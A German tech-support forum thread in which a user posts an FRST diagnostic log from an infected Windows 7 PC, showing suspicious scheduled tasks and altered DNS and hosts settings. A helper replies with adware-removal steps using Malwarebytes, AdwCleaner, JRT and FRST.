Task: C:\Windows\Tasks\DropboxUpdateTaskUserS-1-5-21-2436113304-3946048090-3963370519-1000UA.job => C:\Users\aal\AppData\Local\Dropbox\Update\DropboxUpdate.exe
Task: C:\Windows\Tasks\ShadowOptimizer.job => c:\programdata\{272179fc-eb1c-29ec-2721-179fceb1e7f3}\4436006177664429834c.exe <==== ACHTUNG
Task: C:\Windows\Tasks\TrackGraph.job => c:\programdata\{fdc89853-e970-51f1-fdc8-89853e97614f}\7067044988081247635c.exe <==== ACHTUNG
==================== Verknüpfungen =============================
(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)
==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============
2015-12-29 13:34 - 2015-12-29 13:34 - 00103888 _____ () C:\Program Files\AVAST Software\Avast\log.dll
2015-12-29 13:34 - 2015-12-29 13:34 - 00125512 _____ () C:\Program Files\AVAST Software\Avast\JsonRpcServer.dll
2016-01-07 09:15 - 2016-01-07 09:15 - 02809344 _____ () C:\Program Files\AVAST Software\Avast\defs\16010601\algo.dll
2015-12-29 13:34 - 2015-12-29 13:34 - 00469008 _____ () C:\Program Files\AVAST Software\Avast\ffl2.dll
2015-10-08 10:25 - 2015-08-06 04:47 - 00582144 _____ () C:\Program Files (x86)\WinZipper\curlpp.dll
2015-10-08 10:25 - 2015-07-15 06:58 - 00065688 _____ () C:\Program Files (x86)\WinZipper\zlib1.dll
2014-11-13 17:59 - 2015-01-01 16:48 - 03749888 _____ () C:\Program Files (x86)\Deutsche Telekom AG\Browser 7\mozjs.dll
1996-12-13 23:00 - 1996-12-13 23:00 - 00022016 _____ () C:\Windows\SysWow64\docobj.dll
2015-12-29 13:34 - 2015-12-29 13:34 - 40539648 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll
==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)
==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Gambali => ""="service"
==================== EXE Verknüpfungen (Nicht auf der Ausnahmeliste) ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)
==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)
==================== Hosts Inhalt: ===============================
(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)
2009-07-14 03:34 - 2015-12-19 20:18 - 00000860 ____N C:\Windows\system32\Drivers\etc\hosts
0.0.0.1 mssplus.mcafee.com
==================== Andere Bereiche ============================
(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)
HKU\S-1-5-21-2436113304-3946048090-3963370519-1000\Control Panel\Desktop\\Wallpaper ->
DNS Servers: 199.203.131.145 - 82.163.143.167
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.
==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==
(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)
MSCONFIG\startupreg: msnmsgr => "C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe" /background
==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
FirewallRules: [{FBFA67B8-71A2-445B-8C1C-4F6EDF297F2F}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\wlcsdk.exe
FirewallRules: [{164AF5D4-95DC-4D52-80EA-EF40DC7BFD0F}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [{0E11371D-2AEB-462C-976F-643C42EE2B63}] => (Allow) svchost.exe
FirewallRules: [{85058E1D-FA8A-4A51-85DD-129262FABB47}] => (Allow) C:\Program Files (x86)\Windows Live\Sync\WindowsLiveSync.exe
FirewallRules: [{71D32ECC-8C5C-45D6-8E19-8B51F601391E}] => (Allow) C:\Program Files (x86)\HP\hp software update\hpwucli.exe
FirewallRules: [{35EC7485-3046-4199-BD82-E3ABBDB05C17}] => (Allow) C:\Program Files\HP\HP Deskjet 2050 J510 series\Bin\USBSetup.exe
FirewallRules: [{D506147B-BBE1-4C03-9AB6-5B418920632F}] => (Allow) C:\Program Files\HP\HP Deskjet 2050 J510 series\Bin\USBSetup.exe
FirewallRules: [{FA569A19-D2CC-4484-924C-203F2A837148}] => (Allow) C:\Users\aal\AppData\Roaming\Dropbox\bin\Dropbox.exe
FirewallRules: [{1EE5905C-6F81-4980-AC3D-4EDAAA4781A4}] => (Allow) C:\Users\aal\AppData\Roaming\Dropbox\bin\Dropbox.exe
FirewallRules: [TCP Query User{D69DDC14-9B41-4A50-A7DA-2109EEF87CE1}C:\users\aal\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) C:\users\aal\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [UDP Query User{706FA50B-312A-4A7E-AE28-D8CD285CBCCB}C:\users\aal\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) C:\users\aal\appdata\roaming\dropbox\bin\dropbox.exe
==================== Wiederherstellungspunkte =========================
24-10-2015 07:50:17 Installed Nuance PDF Viewer Plus.
24-10-2015 07:51:11 Installed PaperPort Image Printer 64-bit
29-12-2015 12:00:26 Revo Uninstaller's restore point - Spybot - Search & Destroy
29-12-2015 13:05:08 AVG PC TuneUp 2015 wird installiert
29-12-2015 13:24:44 Revo Uninstaller's restore point - AVG PC TuneUp 2015
29-12-2015 13:26:00 AVG PC TuneUp 2015 wird entfernt
29-12-2015 13:28:43 AVG PC TuneUp 2015 (de-DE) wird entfernt
29-12-2015 13:55:08 Revo Uninstaller's restore point - Google Chrome
29-12-2015 14:11:39 Revo Uninstaller's restore point - Norton 360
29-12-2015 14:27:03 Revo Uninstaller's restore point - Norton Online Backup
29-12-2015 14:27:33 Removed Norton Online Backup
29-12-2015 14:31:25 Revo Uninstaller's restore point - Malwarebytes Anti-Malware Version 2.2.0.1024
==================== Fehlerhafte Geräte im Gerätemanager =============
Name: Teredo Tunneling Pseudo-Interface
Description: Microsoft-Teredo-Tunneling-Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.
==================== Fehlereinträge in der Ereignisanzeige: =========================
Applikationsfehler:
==================
Error: (01/07/2016 10:26:31 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: svchost.exe_DiagTrack, Version: 6.1.7600.16385, Zeitstempel: 0x4a5bc3c1
Name des fehlerhaften Moduls: ntdll.dll, Version: 6.1.7601.18869, Zeitstempel: 0x556366f2
Ausnahmecode: 0xc000000d
Fehleroffset: 0x000000000006ec12
ID des fehlerhaften Prozesses: 0xb18
Startzeit der fehlerhaften Anwendung: 0xsvchost.exe_DiagTrack0
Pfad der fehlerhaften Anwendung: svchost.exe_DiagTrack1
Pfad des fehlerhaften Moduls: svchost.exe_DiagTrack2
Berichtskennung: svchost.exe_DiagTrack3
Error: (01/06/2016 02:21:22 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: svchost.exe_DiagTrack, Version: 6.1.7600.16385, Zeitstempel: 0x4a5bc3c1
Name des fehlerhaften Moduls: ntdll.dll, Version: 6.1.7601.18869, Zeitstempel: 0x556366f2
Ausnahmecode: 0xc000000d
Fehleroffset: 0x000000000006ec12
ID des fehlerhaften Prozesses: 0x86c
Startzeit der fehlerhaften Anwendung: 0xsvchost.exe_DiagTrack0
Pfad der fehlerhaften Anwendung: svchost.exe_DiagTrack1
Pfad des fehlerhaften Moduls: svchost.exe_DiagTrack2
Berichtskennung: svchost.exe_DiagTrack3
Error: (01/05/2016 02:30:31 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: svchost.exe_DiagTrack, Version: 6.1.7600.16385, Zeitstempel: 0x4a5bc3c1
Name des fehlerhaften Moduls: ntdll.dll, Version: 6.1.7601.18869, Zeitstempel: 0x556366f2
Ausnahmecode: 0xc000000d
Fehleroffset: 0x000000000006ec12
ID des fehlerhaften Prozesses: 0xb24
Startzeit der fehlerhaften Anwendung: 0xsvchost.exe_DiagTrack0
Pfad der fehlerhaften Anwendung: svchost.exe_DiagTrack1
Pfad des fehlerhaften Moduls: svchost.exe_DiagTrack2
Berichtskennung: svchost.exe_DiagTrack3
Error: (01/05/2016 07:37:38 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: svchost.exe_DiagTrack, Version: 6.1.7600.16385, Zeitstempel: 0x4a5bc3c1
Name des fehlerhaften Moduls: ntdll.dll, Version: 6.1.7601.18869, Zeitstempel: 0x556366f2
Ausnahmecode: 0xc000000d
Fehleroffset: 0x000000000006ec12
ID des fehlerhaften Prozesses: 0x830
Startzeit der fehlerhaften Anwendung: 0xsvchost.exe_DiagTrack0
Pfad der fehlerhaften Anwendung: svchost.exe_DiagTrack1
Pfad des fehlerhaften Moduls: svchost.exe_DiagTrack2
Berichtskennung: svchost.exe_DiagTrack3
Error: (01/04/2016 09:39:29 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: svchost.exe_DiagTrack, Version: 6.1.7600.16385, Zeitstempel: 0x4a5bc3c1
Name des fehlerhaften Moduls: ntdll.dll, Version: 6.1.7601.18869, Zeitstempel: 0x556366f2
Ausnahmecode: 0xc000000d
Fehleroffset: 0x000000000006ec12
ID des fehlerhaften Prozesses: 0xa6c
Startzeit der fehlerhaften Anwendung: 0xsvchost.exe_DiagTrack0
Pfad der fehlerhaften Anwendung: svchost.exe_DiagTrack1
Pfad des fehlerhaften Moduls: svchost.exe_DiagTrack2
Berichtskennung: svchost.exe_DiagTrack3
Error: (01/03/2016 06:50:06 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: svchost.exe_DiagTrack, Version: 6.1.7600.16385, Zeitstempel: 0x4a5bc3c1
Name des fehlerhaften Moduls: ntdll.dll, Version: 6.1.7601.18869, Zeitstempel: 0x556366f2
Ausnahmecode: 0xc000000d
Fehleroffset: 0x000000000006ec12
ID des fehlerhaften Prozesses: 0xbec
Startzeit der fehlerhaften Anwendung: 0xsvchost.exe_DiagTrack0
Pfad der fehlerhaften Anwendung: svchost.exe_DiagTrack1
Pfad des fehlerhaften Moduls: svchost.exe_DiagTrack2
Berichtskennung: svchost.exe_DiagTrack3
Error: (01/03/2016 05:10:07 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: svchost.exe_DiagTrack, Version: 6.1.7600.16385, Zeitstempel: 0x4a5bc3c1
Name des fehlerhaften Moduls: ntdll.dll, Version: 6.1.7601.18869, Zeitstempel: 0x556366f2
Ausnahmecode: 0xc000000d
Fehleroffset: 0x000000000006ec12
ID des fehlerhaften Prozesses: 0xb54
Startzeit der fehlerhaften Anwendung: 0xsvchost.exe_DiagTrack0
Pfad der fehlerhaften Anwendung: svchost.exe_DiagTrack1
Pfad des fehlerhaften Moduls: svchost.exe_DiagTrack2
Berichtskennung: svchost.exe_DiagTrack3
Error: (01/03/2016 03:42:28 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: svchost.exe_DiagTrack, Version: 6.1.7600.16385, Zeitstempel: 0x4a5bc3c1
Name des fehlerhaften Moduls: ntdll.dll, Version: 6.1.7601.18869, Zeitstempel: 0x556366f2
Ausnahmecode: 0xc000000d
Fehleroffset: 0x000000000006ec12
ID des fehlerhaften Prozesses: 0xb18
Startzeit der fehlerhaften Anwendung: 0xsvchost.exe_DiagTrack0
Pfad der fehlerhaften Anwendung: svchost.exe_DiagTrack1
Pfad des fehlerhaften Moduls: svchost.exe_DiagTrack2
Berichtskennung: svchost.exe_DiagTrack3
Error: (01/03/2016 10:53:36 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: svchost.exe_DiagTrack, Version: 6.1.7600.16385, Zeitstempel: 0x4a5bc3c1
Name des fehlerhaften Moduls: ntdll.dll, Version: 6.1.7601.18869, Zeitstempel: 0x556366f2
Ausnahmecode: 0xc000000d
Fehleroffset: 0x000000000006ec12
ID des fehlerhaften Prozesses: 0xae4
Startzeit der fehlerhaften Anwendung: 0xsvchost.exe_DiagTrack0
Pfad der fehlerhaften Anwendung: svchost.exe_DiagTrack1
Pfad des fehlerhaften Moduls: svchost.exe_DiagTrack2
Berichtskennung: svchost.exe_DiagTrack3
Error: (01/02/2016 10:17:04 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: svchost.exe_DiagTrack, Version: 6.1.7600.16385, Zeitstempel: 0x4a5bc3c1
Name des fehlerhaften Moduls: ntdll.dll, Version: 6.1.7601.18869, Zeitstempel: 0x556366f2
Ausnahmecode: 0xc000000d
Fehleroffset: 0x000000000006ec12
ID des fehlerhaften Prozesses: 0xbb8
Startzeit der fehlerhaften Anwendung: 0xsvchost.exe_DiagTrack0
Pfad der fehlerhaften Anwendung: svchost.exe_DiagTrack1
Pfad des fehlerhaften Moduls: svchost.exe_DiagTrack2
Berichtskennung: svchost.exe_DiagTrack3
Systemfehler:
=============
Error: (01/07/2016 10:28:15 AM) (Source: Service Control Manager) (EventID: 7024) (User: )
Description: Der Dienst "Norton 360" wurde mit folgendem dienstspezifischem Fehler beendet: %%-1.
Error: (01/07/2016 10:28:14 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Das Zeitlimit (30000 ms) wurde beim Verbindungsversuch mit dem Dienst LiveReader erreicht.
Error: (01/07/2016 10:26:32 AM) (Source: Service Control Manager) (EventID: 7016) (User: )
Description: Der Dienst "NVIDIA Display Driver Service" hat einen ungültigen aktuellen Status gemeldet: 32
Error: (01/07/2016 10:26:32 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Diagnostics Tracking Service" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 30000 Millisekunden durchgeführt: Neustart des Diensts.
Error: (01/07/2016 10:04:58 AM) (Source: Service Control Manager) (EventID: 7024) (User: )
Description: Der Dienst "Norton 360" wurde mit folgendem dienstspezifischem Fehler beendet: %%-1.
Error: (01/07/2016 10:04:58 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Das Zeitlimit (30000 ms) wurde beim Verbindungsversuch mit dem Dienst LiveReader erreicht.
Error: (01/07/2016 09:28:54 AM) (Source: Service Control Manager) (EventID: 7016) (User: )
Description: Der Dienst "NVIDIA Display Driver Service" hat einen ungültigen aktuellen Status gemeldet: 32
Error: (01/07/2016 09:15:31 AM) (Source: Service Control Manager) (EventID: 7024) (User: )
Description: Der Dienst "Norton 360" wurde mit folgendem dienstspezifischem Fehler beendet: %%-1.
Error: (01/07/2016 09:15:30 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Das Zeitlimit (30000 ms) wurde beim Verbindungsversuch mit dem Dienst LiveReader erreicht.
Error: (01/06/2016 05:31:59 PM) (Source: Service Control Manager) (EventID: 7016) (User: )
Description: Der Dienst "NVIDIA Display Driver Service" hat einen ungültigen aktuellen Status gemeldet: 32
CodeIntegrity:
===================================
Date: 2016-01-07 10:18:18.609
Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Program Files (x86)\T-Home\Dialerschutz-Software\df64.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2016-01-07 09:21:59.838
Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Program Files (x86)\T-Home\Dialerschutz-Software\df64.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2016-01-06 17:24:23.370
Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Program Files (x86)\T-Home\Dialerschutz-Software\df64.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2016-01-06 13:13:59.157
Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Program Files (x86)\T-Home\Dialerschutz-Software\df64.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2016-01-06 10:22:56.656
Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Program Files (x86)\T-Home\Dialerschutz-Software\df64.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2016-01-06 10:03:58.358
Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Program Files (x86)\T-Home\Dialerschutz-Software\df64.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2016-01-06 09:55:25.524
Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Program Files (x86)\T-Home\Dialerschutz-Software\df64.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2016-01-06 09:44:04.048
Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Program Files (x86)\T-Home\Dialerschutz-Software\df64.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2016-01-06 09:28:14.102
Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Program Files (x86)\T-Home\Dialerschutz-Software\df64.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2016-01-06 09:00:17.652
Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Program Files (x86)\T-Home\Dialerschutz-Software\df64.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
==================== Speicherinformationen ===========================
Prozessor: Pentium(R) Dual-Core CPU E5400 @ 2.70GHz
Prozentuale Nutzung des RAM: 49%
Installierter physikalischer RAM: 3071.23 MB
Verfügbarer physikalischer RAM: 1541.47 MB
Summe virtueller Speicher: 6140.68 MB
Verfügbarer virtueller Speicher: 4365.46 MB
==================== Laufwerke ================================
Drive c: (eMachines) (Fixed) (Total:917.41 GB) (Free:855.1 GB) NTFS
Drive l: (USB-HDD) (Fixed) (Total:1397.26 GB) (Free:1364.83 GB) NTFS
==================== MBR & Partitionstabelle ==================
========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: 730E7791)
Partition 1: (Not Active) - (Size=14 GB) - (Type=27)
Partition 2: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=917.4 GB) - (Type=07 NTFS)
========================================================
Disk: 1 (Size: 1397.3 GB) (Disk ID: 48686A76)
Partition 1: (Not Active) - (Size=1397.3 GB) - (Type=07 NTFS)
==================== Ende von Addition.txt ============================
Messbert |
|
07.01.2016, 11:15
| #2 |
| /// Winkelfunktion /// TB-Süch-Tiger™   |  Windows 7: Fehlermeldung Systemstart "RunDLL: Problem beim Starten von C:\Users\aal\AppData\Local\Camera\Component\Bin\CameraComponent.DLL" Hi,
__________________Lade Dir bitte von hier  Revo Uninstaller (alternativ portable Revo Uninstaller) herunter.
Danach sehen wir weiter.
__________________ |
|
07.01.2016, 11:59
| #3 |
| |  Windows 7: Fehlermeldung Systemstart "RunDLL: Problem beim Starten von C:\Users\aal\AppData\Local\Camera\Component\Bin\CameraComponent.DLL" Hallo Cosinus,
__________________alles erledigt.  Wie geht es weiter? Gruß, Messbert |
|
07.01.2016, 12:29
| #4 |
| /// Winkelfunktion /// TB-Süch-Tiger™ | Windows 7: Fehlermeldung Systemstart "RunDLL: Problem beim Starten von C:\Users\aal\AppData\Local\Camera\Component\Bin\CameraComponent.DLL" Adware/Junkware/Toolbars entfernen 1. Schritt: Malwarebytes Downloade Dir bitte  Malwarebytes Anti-Malware
(alte Versionen von adwCleaner und falls vorhanden JRT vorher löschen, danach neu runterladen auf den Desktop!) 2. Schritt: adwCleaner Downloade Dir bitte  AdwCleaner auf deinen Desktop.
3. Schritt: JRT - Junkware Removal Tool Beende bitte Deine Schutzsoftware um eventuelle Konflikte zu vermeiden.
4. Schritt: Frisches Log mit FRST Bitte lade dir die passende Version von Farbar's Recovery Scan Tool auf deinen Desktop:  FRST 32-Bit | FRST 64-Bit(Wenn du nicht sicher bist: Lade beide Versionen oder unter Start > Computer (Rechtsklick) > Eigenschaften nachschauen)
__________________ Logfiles bitte immer in CODE-Tags posten  |
|
| Themen zu Windows 7: Fehlermeldung Systemstart "RunDLL: Problem beim Starten von C:\Users\aal\AppData\Local\Camera\Component\Bin\CameraComponent.DLL" |
| antivirus, desktop, dnsapi.dll, error, failed, flash player, google, helper, home, installation, installmanager.exe, malware, mozilla, problem, programm, realtek, registry, rundll, scan, security, software, starten, svchost.exe, symantec, system, teredo, viren, windows |
dann auf 
und dann auf 
. 
Linear-Darstellung
